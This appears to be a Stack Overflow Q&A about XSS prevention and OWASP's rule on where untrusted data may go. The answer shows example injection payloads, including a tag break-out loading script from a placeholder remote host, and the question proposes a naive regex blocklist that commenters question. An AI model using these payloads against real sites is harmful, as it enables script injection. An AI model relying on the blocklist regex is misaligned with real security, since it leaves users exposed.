# Clarify one of the rules in XSS (Cross Site Scripting) Prevention Cheat Sheet

Tags: javascript, html, regex, xss

I am trying to prevent cross-site scripting on my website.

Initially I thought that filtering `<script...>` and `alert(...)` should do the job.

So I used the regular expression: `^((?!(<script.*>|alert\(.*\))) [\s\S])*$`.

But then I read some rules on [this web page](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#RULE_.230_-_Never_Insert_Untrusted_Data_Except_in_Allowed_Locations), and I realized that I had a lot more to cover.

**So I have a couple of questions:**

First (also mentioned in the title), with regards to the following two rules from that web page:

```
<div ...NEVER PUT UNTRUSTED DATA HERE...=test />    in an attribute name
<NEVER PUT UNTRUSTED DATA HERE... href="/test" />   in a tag name
```

Do I take that `test` string as is, or else, what exactly does it stand for?

Second (more generally), [this web page](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)) says that the variety of attacks based on XSS is almost limitless. So I would like to know if you think that I'm on a losing battle here, trying to fight this off **only** with a regular expression.

Thank you.

Comment: Wont escaping all input data make it safe enough ?

Comment: @FlyingGambit: Yes, but I would like to allow users that sign up to my website to decorate their profile using HTML tags.

Comment: I don't know what you use the regexp for but almost every filter/sanitize approach I've seen out there is plain wrong and comes from a wrong understanding of the problem. It's so common that there're many well known forums where you get your input damaged if you type a `<` symbol.

Comment: @ÁlvaroGonzález: So in short, I'd be better off preventing any use of `<`? Please note my previous comment, with regards to one of the requirements that I am trying to fulfill.

Comment: @goodvibration I'm saying the exact opposite!

Answer (score 1):

The overall idea is to keep code and data separated. You're in potential trouble when you inject untrusted data in a place where it's handled as code. HTML attributes are such a case, because user could inject anything:

```
<img <?php echo $input; ?> src="...">
```

```
<img onload="downloadAndExecuteMaliciousCode()" src="...">
<img ><script src="http://example.com/maliciousCode"></script><img src="...">
```

Comment: What if its a comment section and I type some malicious script in it ? how do we prevent that ?

Comment: @FlyingGambit Mainly, by not injecting external input in comments section in the first place. It can make sense to inject such input in other places where data is expected (e.g. an HTML attribute **value**) but, what does the user need to do in source comments?

Comment: You've specified a few examples that are not even listed within [RULE #0](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#RULE_.230_-_Never_Insert_Untrusted_Data_Except_in_Allowed_Locations). Should I infer that this web page (and this rule in particular) is incomplete, or am I missing anything?

Comment: @goodvibration calling the owasp webpage being incomplete is quite ... too far. Lots of developers/administrators in security uses that site as a guideline ... Tbf, read the document as whole. Don't focus on those rules only.

Comment: @goodvibration Sorry, I wasn't aware that the page had examples. That's just my interpretation of the "in an attribute name" statement. And of course I'm not an authority on the subject :)